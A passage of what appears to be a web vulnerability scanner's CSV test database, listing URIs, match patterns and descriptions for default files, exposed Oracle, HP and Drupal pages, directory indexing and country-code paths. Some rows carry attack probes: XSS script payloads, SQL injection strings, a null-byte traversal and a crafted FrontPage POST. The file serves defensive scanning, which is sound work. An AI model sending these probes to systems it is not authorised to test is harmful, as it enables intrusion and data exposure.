impact.\",\"\",\"\"\n\"003469\",\"\",\"1a\",\"/pls/portal/null\",\"GET\",\"CODE:200\",\"Access to Oracle pages could have an unknown impact.\",\"\",\"\"\n\"003470\",\"\",\"1b\",\"/OA_MEDIA/\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003471\",\"\",\"1b\",\"/OA_HTML/META-INF/\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003472\",\"\",\"1b\",\"/OA_HTML/jsp/por/services/login.jsp\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003473\",\"\",\"1b\",\"/OA_HTML/PTB/ICXINDEXBASECASE.htm\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003474\",\"\",\"1b\",\"/OA_HTML/PTB/ECXOTAPing.htm\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003475\",\"\",\"1b\",\"/OA_HTML/PTB/xml_sample1.htm\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003476\",\"\",\"1b\",\"/OA_HTML/jsp/wf/WFReassign.jsp\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003477\",\"\",\"1b\",\"/OA_JAVA/Oracle/\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003478\",\"\",\"1b\",\"/OA_JAVA/servlet.zip\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003479\",\"\",\"1b\",\"/OA_JAVA/oracle/forms/registry/Registry.dat\",\"GET\",\"CODE:200\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003480\",\"\",\"1b\",\"/OA_HTML/oam/\",\"GET\",\"BODY:Oracle Access Manager\",\"Oracle Applications portal pages found.\",\"\",\"\"\n\"003481\",\"CWE-552\",\"1b\",\"/OA_HTML/jsp/\",\"GET\",\"CODE:200\",\"Oracle Applications portal page found\",\"\",\"\"\n\"003482\",\"CWE-552\",\"1b\",\"/OA_HTML/jsp/fnd/fndversion.jsp\",\"GET\",\"CODE:200\",\"Oracle Applications help page found.\",\"\",\"\"\n\"003483\",\"CWE-552\",\"1b\",\"/OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc\",\"GET\",\"CODE:200\",\"Oracle Applications help page found.\",\"\",\"\"\n\"003484\",\"CWE-552\",\"1b\",\"/OA_HTML/jsp/fnd/fndhelputil.jsp\",\"GET\",\"CODE:200\",\"Oracle Applications help page found.\",\"\",\"\"\n\"003485\",\"\",\"1\",\"/install/install.php\",\"GET\",\"CODE:200\",\"Install file found.\",\"\",\"\"\n\"003486\",\"CVE-2000-0114\",\"3\",\"/_vti_bin/shtml.dll/_vti_rpc\",\"POST\",\"BODY:The user\",\"The anonymous FrontPage user is revealed through a crafted POST.\",\"method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f\",\"\"\n\"003487\",\"\",\"3\",\"/cehttp/trace\",\"GET\",\"CODE:200\",\"Sterling Commerce Connect Direct trace log file may contain user ID information.\",\"\",\"\"\n\"003488\",\"\",\"3\",\"/cehttp/property/\",\"GET\",\"CODE:200\",\"Sterling Commerce Connect Direct configuration files.\",\"\",\"\"\n\"003489\",\"\",\"b\",\"/webdav/index.html\",\"GET\",\"BODY:WebDAV support\",\"WebDAV support is enabled.\",\"\",\"\"\n\"003490\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/hp-ux/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003491\",\"\",\"13b\",\"/hp_docs/\",\"GET\",\"BODY:web server suite\",\"HP-UX Web Server Suite was found.\",\"\",\"\"\n\"003492\",\"\",\"13b\",\"/hp_docs/cgi-bin/index.cgi\",\"GET\",\"BODY:web server suite\",\"HP-UX Web Server Suite was found.\",\"\",\"\"\n\"003493\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/hp_docs/xmltools/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. HP-UX Web Server Suite xml tools.\",\"\",\"\"\n\"003494\",\"\",\"3\",\"@CGIDIRSshowuser.cgi\",\"GET\",\"BODY:Username\",\"Shows the output of the 'whoami' command, which shows the web server user.\",\"\",\"\"\n\"003495\",\"\",\"1\",\"@CGIDIRSman2html\",\"GET\",\"BODY:manual page\",\"Gateway to Unix man pages.\",\"\",\"\"\n\"003496\",\"\",\"3\",\"/status?full=true\",\"GET\",\"BODY:Tomcat Status\",\"Apache Tomcat and/or JBoss information page.\",\"\",\"\"\n\"003497\",\"CVE-2007-3685\",\"4\",\"/rpc.php?q=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.\",\"\",\"\"\n\"003499\",\"CVE-2007-3684\",\"9\",\"/db.php?q='&t='\",\"GET\",\"BODY:MySQL server version\",\"Unobtrusive Ajax Star Rating Bar db.php is vulnerable to SQL injection in the q and t variables.\",\"\",\"\"\n\"003500\",\"CVE-2007-3684\",\"9\",\"/rpc.php?q='&t='\",\"GET\",\"BODY:MySQL server version\",\"Unobtrusive Ajax Star Rating Bar rpc.php is vulnerable to SQL injection in the q and t variables.\",\"\",\"\"\n\"003501\",\"CWE-552\",\"b\",\"/@JUNK(5).cfm\",\"GET\",\"BODY:BlueDragon Time\",\"Server is running BlueDragon from New Atlanta for CFML processing.\",\"\",\"\"\n\"003502\",\"CWE-552\",\"1\",\"/jsp-examples/\",\"GET\",\"BODY:Java Server Pages\",\"Apache Java Server Pages documentation.\",\"\",\"\"\n\"003503\",\"CWE-552\",\"b\",\"/nps/iManager.html\",\"GET\",\"BODY:Novell,\\sInc\",\"Novell iManager found.\",\"\",\"\"\n\"003504\",\"CWE-552\",\"3b\",\"/nps/version.jsp\",\"GET\",\"BODY:Novell,\\sInc\",\"Novell iManager version found.\",\"\",\"\"\n\"003505\",\"CWE-552\",\"3b\",\"/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About\",\"GET\",\"BODY:Novell,\\sInc\",\"Novell iManager version found.\",\"\",\"\"\n\"003506\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/doc/Judy/demo/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. HP Judy language demos.\",\"\",\"\"\n\"003508\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/doc/vxvm/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. HP help documentation.\",\"\",\"\"\n\"003509\",\"CWE-552\",\"2\",\"/doc/PRINTER-JPN-S\",\"GET\",\"BODY:HPDPS\",\"HP DPS\",\"\",\"\"\n\"003510\",\"CWE-552\",\"2\",\"/doc/PRINTER-JPN-E\",\"GET\",\"BODY:HPDPS\",\"HP DPS\",\"\",\"\"\n\"003511\",\"CWE-552\",\"2\",\"/doc/NTP_Primer.txt\",\"GET\",\"BODY:Network Time\",\"HP server documentation.\",\"\",\"\"\n\"003512\",\"CWE-552\",\"2\",\"/doc/LICENSE.SMAIL893\",\"GET\",\"BODY:license terms\",\"HP server license document.\",\"\",\"\"\n\"003513\",\"CWE-552\",\"2\",\"/doc/PRINT-ASE-NOTE\",\"GET\",\"BODY:Obsolescence\",\"HP server documentation.\",\"\",\"\"\n\"003514\",\"CWE-552\",\"2\",\"/doc/SETNETLP_Guide-E\",\"GET\",\"BODY:Configurable Parameters\",\"HP server documentation.\",\"\",\"\"\n\"003515\",\"CWE-552\",\"2\",\"/doc/SETNETLP_Guide-S\",\"GET\",\"BODY:Configurable Parameters\",\"HP server documentation.\",\"\",\"\"\n\"003516\",\"CWE-552\",\"2\",\"/doc/dir.perm.txt\",\"GET\",\"BODY:part of this patch\",\"HP server documentation.\",\"\",\"\"\n\"003517\",\"CWE-552\",\"2\",\"/doc/ASX-UTF8\",\"GET\",\"BODY:Asian System\",\"HP server documentation.\",\"\",\"\"\n\"003518\",\"CWE-552\",\"2\",\"/doc/ASX-TCH\",\"GET\",\"BODY:Release Note\",\"HP server documentation.\",\"\",\"\"\n\"003519\",\"CWE-552\",\"2\",\"/doc/ASX-SCH\",\"GET\",\"BODY:Release Note\",\"HP server documentation.\",\"\",\"\"\n\"003520\",\"CWE-552\",\"2\",\"/doc/ASX-KOR\",\"GET\",\"BODY:Release Note\",\"HP server documentation.\",\"\",\"\"\n\"003521\",\"CWE-552\",\"2\",\"/doc/ASX-JPN-S\",\"GET\",\"BODY:Asian\\-Core\",\"HP server documentation.\",\"\",\"\"\n\"003522\",\"CWE-552\",\"2\",\"/doc/ASX-JPN-E\",\"GET\",\"BODY:Asian\\-Core\",\"HP server documentation.\",\"\",\"\"\n\"003523\",\"CWE-552\",\"2\",\"/doc/ASX-JPN\",\"GET\",\"BODY:Release Note\",\"HP server documentation.\",\"\",\"\"\n\"003524\",\"CWE-552\",\"2\",\"/doc/11iSRB.txt\",\"GET\",\"BODY:Release Bulletin\",\"HP server documentation.\",\"\",\"\"\n\"003525\",\"CWE-552\",\"2\",\"/doc/11iRelNotes.txt\",\"GET\",\"BODY:Release Notes\",\"HP server documentation.\",\"\",\"\"\n\"003526\",\"CWE-552\",\"2\",\"/doc/11iRelNotes.html\",\"GET\",\"BODY:Release Notes\",\"HP server documentation.\",\"\",\"\"\n\"003527\",\"CWE-552\",\"2\",\"/doc/11.00RelNotes\",\"GET\",\"BODY:Release Notes\",\"HP server documentation.\",\"\",\"\"\n\"003528\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/doc/Judy/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. HP server Judy documentation.\",\"\",\"\"\n\"003529\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/doc/TechPrtServ/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found. HP Documentation.\",\"\",\"\"\n\"003530\",\"CWE-552\",\"2\",\"/doc/sw_patches.txt\",\"GET\",\"BODY:HP 9000 Series\",\"HP server documentation.\",\"\",\"\"\n\"003531\",\"CWE-552\",\"2\",\"/doc/Judy/COPYRIGHT\",\"GET\",\"BODY:Trademark Notice\",\"HP server documentation.\",\"\",\"\"\n\"003532\",\"CWE-552\",\"2\",\"/doc/Judy/Judy1_3x.htm\",\"GET\",\"BODY:Judy1 macros\",\"HP server Judy documentation.\",\"\",\"\"\n\"003533\",\"CWE-552\",\"2\",\"/doc/Judy/Judy1_funcs_3x.htm\",\"GET\",\"BODY:Judy1 functions\",\"HP server Judy documentation.\",\"\",\"\"\n\"003534\",\"CWE-552\",\"2\",\"/doc/Judy/JudyL_funcs_3x.htm\",\"GET\",\"BODY:Judy1 functions\",\"HP server Judy documentation.\",\"\",\"\"\n\"003535\",\"CWE-552\",\"2\",\"/doc/Judy/JudySL_funcs_3x.htm\",\"GET\",\"BODY:JudySL functions\",\"HP server Judy documentation.\",\"\",\"\"\n\"003536\",\"CWE-552\",\"2\",\"/doc/Judy/Judy_3x.htm\",\"GET\",\"BODY:Judy functions\",\"HP server Judy documentation.\",\"\",\"\"\n\"003537\",\"CWE-552\",\"2\",\"/doc/Judy/JudySL_3x.htm\",\"GET\",\"BODY:JudySL macros\",\"HP server Judy documentation.\",\"\",\"\"\n\"003538\",\"CWE-552\",\"2\",\"/doc/Judy/JudyL_3x.htm\",\"GET\",\"BODY:JudyL macros\",\"HP server Judy documentation.\",\"\",\"\"\n\"003539\",\"CWE-552\",\"2\",\"/doc/Judy/LICENSE\",\"GET\",\"BODY:Software License&&CODE:200\",\"HP server Judy documentation.\",\"\",\"\"\n\"003540\",\"CWE-552\",\"2\",\"/doc/Judy/demo/JudySort.c\",\"GET\",\"BODY:static char\",\"HP server Judy code.\",\"\",\"\"\n\"003541\",\"CWE-552\",\"2\",\"/doc/Judy/demo/Makefile\",\"GET\",\"BODY:libJudy\\.a\",\"HP server Judy code.\",\"\",\"\"\n\"003542\",\"CWE-552\",\"2\",\"/doc/Judy/demo/funhist.c\",\"GET\",\"BODY:FUNCTION HISTOGRAM\",\"HP server Judy code.\",\"\",\"\"\n\"003543\",\"CWE-552\",\"2\",\"/doc/Judy/demo/interSL.c\",\"GET\",\"BODY:INTERACTIVE JUDYSL\",\"HP server Judy code.\",\"\",\"\"\n\"003544\",\"CWE-552\",\"2\",\"/doc/icodUserGuide.pdf\",\"GET\",\"CODE:200\",\"Instant Capacity on Demand (iCOD) Userís Guide.\",\"\",\"\"\n\"003545\",\"CWE-552\",\"2\",\"/doc/planning_SuperDome_configs.pdf\",\"GET\",\"CODE:200\",\"Planning HP SuperDome Configurations\",\"\",\"\"\n\"003546\",\"CWE-552\",\"2\",\"/doc/vxvm/pitc_ag.pdf\",\"GET\",\"CODE:200\",\"VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.\",\"\",\"\"\n\"003547\",\"CWE-552\",\"2\",\"/doc/Judy/Judy_tech_book.pdf\",\"GET\",\"CODE:200\",\"HP Judy documentation found.\",\"\",\"\"\n\"003548\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_ag.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003549\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_hwnotes.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003550\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_ig.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003551\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_mig.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003552\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_tshoot.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003553\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_notes.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003554\",\"CWE-552\",\"2\",\"/doc/vxvm/vxvm_ug.pdf\",\"GET\",\"CODE:200\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003555\",\"\",\"1\",\"/staging/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"003556\",\"\",\"1\",\"/_archive/\",\"GET\",\"CODE:200\",\"Archive found.\",\"\",\"\"\n\"003557\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"12\",\"/pdfs/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003558\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/upload/test.html\",\"GET\",\"BODY:Custom Uploader&&CODE:200\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003559\",\"\",\"0\",\"@FCKEDITOReditor/dialog/fck_image.html\",\"GET\",\"BODY:Short Description&&CODE:200\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003560\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/test.html\",\"GET\",\"BODY:Connector&&CODE:200\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003561\",\"\",\"0\",\"@FCKEDITOReditor/dialog/fck_flash.html\",\"GET\",\"BODY:Preview&&CODE:200\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003562\",\"\",\"0\",\"@FCKEDITOReditor/dialog/fck_link.html\",\"GET\",\"BODY:Link Properties&&CODE:200\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003563\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/asp/connector.asp\",\"GET\",\"BODY:text editor for\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003564\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/crm/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003565\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/static/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003566\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/w3c/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003567\",\"http://projects.webappsec.org/w/page/13246922/Directory%20Indexing\",\"2\",\"/dynamic/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"003568\",\"https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file\",\"b\",\"/update.php\",\"GET\",\"BODY:access_check\",\"Drupal's update.php was found.\",\"\",\"\"\n\"003569\",\"\",\"1\",\"/INSTALL.txt\",\"GET\",\"CODE:200\",\"Default file found.\",\"\",\"\"\n\"003570\",\"\",\"1\",\"/UPGRADE.txt\",\"GET\",\"CODE:200\",\"Default file found.\",\"\",\"\"\n\"003571\",\"https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-filehttps://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file\",\"b\",\"/install.php\",\"GET\",\"BODY:Drupal already installed\",\"Drupal install.php file found.\",\"\",\"\"\n\"003572\",\"\",\"1\",\"/install.php\",\"GET\",\"CODE:200\",\"install.php file found.\",\"\",\"\"\n\"003573\",\"\",\"1b\",\"/LICENSE.txt\",\"GET\",\"CODE:200\",\"License file found may identify site software.\",\"\",\"\"\n\"003574\",\"\",\"1b\",\"/upgrade.php\",\"GET\",\"CODE:200\",\"upgrade.php was found.\",\"\",\"\"\n\"003575\",\"\",\"1\",\"/xmlrpc.php\",\"GET\",\"CODE:200\",\"xmlrpc.php was found.\",\"\",\"\"\n\"003576\",\"\",\"1b\",\"/CHANGELOG.txt\",\"GET\",\"CODE:200\",\"A changelog was found.\",\"\",\"\"\n\"003577\",\"https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file\",\"b\",\"/INSTALL.mysql.txt\",\"GET\",\"BODY:CREATE THE\",\"Drupal installation file found.\",\"\",\"\"\n\"003578\",\"https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file\",\"b\",\"/INSTALL.pgsql.txt\",\"GET\",\"BODY:CREATE THE\",\"Drupal installation file found.\",\"\",\"\"\n\"003579\",\"https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file\",\"b\",\"/MAINTAINERS.txt\",\"GET\",\"BODY:CREATE THE\",\"Drupal maintainers file found.\",\"\",\"\"\n\"003580\",\"\",\"23b\",\"/sites/default/settings.php\",\"GET\",\"BODY:site\\-specific configuration\",\"The Drupal settings.php file is sent in plain text not parsed by PHP. This file may contain a database connection string.\",\"\",\"\"\n\"003581\",\"CVE-2007-5253\",\"7\",\"@CGIDIRSc32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf\",\"GET\",\"CODE:200\",\"Cart32 contains a null byte directory traversal in the ImageName variable.\",\"\",\"\"\n\"003582\",\"\",\"3\",\"/sitemap.gz\",\"GET\",\"CODE:200\",\"The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.\",\"\",\"\"\n\"003583\",\"\",\"3\",\"/content/sitemap.gz\",\"GET\",\"CODE:200\",\"The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\\'s structure.\",\"\",\"\"\n\"003584\",\"https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/\",\"b\",\"/icons/README\",\"GET\",\"BODY:Public Domain Icons\",\"Apache default file found.\",\"\",\"\"\n\"003585\",\"\",\"b\",\"/localstart.asp\",\"GET\",\"BODY:<title>Welcome to Windows\",\"Default IIS install page found.\",\"\",\"\"\n\"003586\",\"\",\"b\",\"/ampache/update.php\",\"GET\",\"BODY:Ampache Update\",\"Ampache update page is visible.\",\"\",\"\"\n\"003587\",\"\",\"b\",\"/ampache/login.php\",\"GET\",\"BODY:Ampache :: Pour l\\&#039;Amour de la Musique\",\"Ampache is installed.\",\"\",\"\"\n\"003588\",\"\",\"b\",\"/ampache/docs/README\",\"GET\",\"BODY:README \\- Ampache\",\"Ampache installation documents found.\",\"\",\"\"\n\"003589\",\"\",\"b\",\"/cgi-bin/webcgi/about\",\"GET\",\"BODY:\\/cgi\\/locale\\/about_en\\.xsl\",\"Host seems to be a Dell Remote Access Controller (RAC).\",\"\",\"\"\n\"003590\",\"\",\"bd\",\"/webservices/IlaWebServices\",\"GET\",\"CODE:200\",\"Host has the Oracle iLearning environment installed.\",\"\",\"\"\n\"003591\",\"\",\"a\",\"/SoundBridgeStatus.html\",\"GET\",\"CODE:200&&BODY:SoundBridge is running software version\",\"Host is running the SoundBridge web server which doesn't support identification.\",\"\",\"\"\n\"003592\",\"CVE-2009-1777\",\"4b\",\"@CGIDIRSFormMail.pl\",\"GET\",\"BODY:Version 1\\.92\",\"Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting, CRLF injection, and Cross-Site Scripting.\",\"\",\"\"\n\"003593\",\"\",\"1\",\"/phone/\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"003594\",\"\",\"b\",\"/Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx\",\"GET\",\"BODY:txtUsername\",\"DotNetNuke is running on the web server.\",\"\",\"\"\n\"003595\",\"CVE-2005-4838\",\"24\",\"/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(111)</script>\",\"GET\",\"BODY:<script>alert\\(111\\)<\\/script>\",\"The tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003596\",\"CVE-2005-4838\",\"24\",\"/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>\",\"GET\",\"BODY:<script>alert\\(112\\)<\\/script>\",\"The tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003597\",\"CVE-2005-4838\",\"24\",\"/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>\",\"GET\",\"BODY:<script>alert\\(113\\)<\\/script>\",\"The Tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003598\",\"https://docs.microsoft.com/en-us/previous-versions/dotnet/articles/aa479045(v=msdn.10)?redirectedfrom=MSDN#aspplusvalid_clientside\",\"b\",\"/aspnet_files/\",\"GET\",\"CODE:403&&BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\".NET client side script files indicate .NET may be running.\",\"\",\"\"\n\"003599\",\"\",\"1\",\"/Admin/\",\"GET\",\"CODE:200&&BODY:Directory Listing Denied\",\"This might be interesting.\",\"\",\"\"\n\"003600\",\"\",\"1\",\"/af/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Afghanistan)\",\"\",\"\"\n\"003601\",\"\",\"1\",\"/ax/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Aland Islands)\",\"\",\"\"\n\"003602\",\"\",\"1\",\"/al/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Albania)\",\"\",\"\"\n\"003603\",\"\",\"1\",\"/dz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Algeria)\",\"\",\"\"\n\"003604\",\"\",\"1\",\"/as/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (American Samoa)\",\"\",\"\"\n\"003605\",\"\",\"1\",\"/ad/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Andorra)\",\"\",\"\"\n\"003606\",\"\",\"1\",\"/ao/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Angola)\",\"\",\"\"\n\"003607\",\"\",\"1\",\"/ai/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Anguilla)\",\"\",\"\"\n\"003608\",\"\",\"1\",\"/aq/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Antarctica)\",\"\",\"\"\n\"003609\",\"\",\"1\",\"/ag/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Antigua And Barbuda)\",\"\",\"\"\n\"003610\",\"\",\"1\",\"/ar/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Argentina)\",\"\",\"\"\n\"003611\",\"\",\"1\",\"/am/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Armenia)\",\"\",\"\"\n\"003612\",\"\",\"1\",\"/aw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Aruba)\",\"\",\"\"\n\"003613\",\"\",\"1\",\"/au/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Australia)\",\"\",\"\"\n\"003614\",\"\",\"1\",\"/at/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Austria)\",\"\",\"\"\n\"003615\",\"\",\"1\",\"/az/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Azerbaijan)\",\"\",\"\"\n\"003616\",\"\",\"1\",\"/bs/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bahamas)\",\"\",\"\"\n\"003617\",\"\",\"1\",\"/bh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bahrain)\",\"\",\"\"\n\"003618\",\"\",\"1\",\"/bd/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bangladesh)\",\"\",\"\"\n\"003619\",\"\",\"1\",\"/bb/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Barbados)\",\"\",\"\"\n\"003620\",\"\",\"1\",\"/by/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Belarus)\",\"\",\"\"\n\"003621\",\"\",\"1\",\"/be/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Belgium)\",\"\",\"\"\n\"003622\",\"\",\"1\",\"/bz/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Belize)\",\"\",\"\"\n\"003623\",\"\",\"1\",\"/bj/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Benin)\",\"\",\"\"\n\"003624\",\"\",\"1\",\"/bm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bermuda)\",\"\",\"\"\n\"003625\",\"\",\"1\",\"/bt/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bhutan)\",\"\",\"\"\n\"003626\",\"\",\"1\",\"/bo/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bolivia)\",\"\",\"\"\n\"003627\",\"\",\"1\",\"/ba/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bosnia And Herzegovina)\",\"\",\"\"\n\"003628\",\"\",\"1\",\"/bw/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Botswana)\",\"\",\"\"\n\"003629\",\"\",\"1\",\"/bv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bouvet Island)\",\"\",\"\"\n\"003630\",\"\",\"1\",\"/br/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Brazil)\",\"\",\"\"\n\"003631\",\"\",\"1\",\"/io/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (British Indian Ocean Territory)\",\"\",\"\"\n\"003632\",\"\",\"1\",\"/bn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Brunei Darussalam)\",\"\",\"\"\n\"003633\",\"\",\"1\",\"/bg/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Bulgaria)\",\"\",\"\"\n\"003634\",\"\",\"1\",\"/bf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Burkina Faso)\",\"\",\"\"\n\"003635\",\"\",\"1\",\"/bi/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Burundi)\",\"\",\"\"\n\"003636\",\"\",\"1\",\"/kh/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cambodia)\",\"\",\"\"\n\"003637\",\"\",\"1\",\"/cm/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cameroon)\",\"\",\"\"\n\"003638\",\"\",\"1\",\"/ca/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Canada)\",\"\",\"\"\n\"003639\",\"\",\"1\",\"/cv/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cape Verde)\",\"\",\"\"\n\"003640\",\"\",\"1\",\"/ky/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Cayman Islands)\",\"\",\"\"\n\"003641\",\"\",\"1\",\"/cf/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Central African Republic)\",\"\",\"\"\n\"003642\",\"\",\"1\",\"/td/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Chad)\",\"\",\"\"\n\"003643\",\"\",\"1\",\"/cl/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code (Chile)\",\"\",\"\"\n\"003644\",\"\",\"1\",\"/cn/\",\"GET\",\"CODE:200\",\"This might be interesting: potential country code 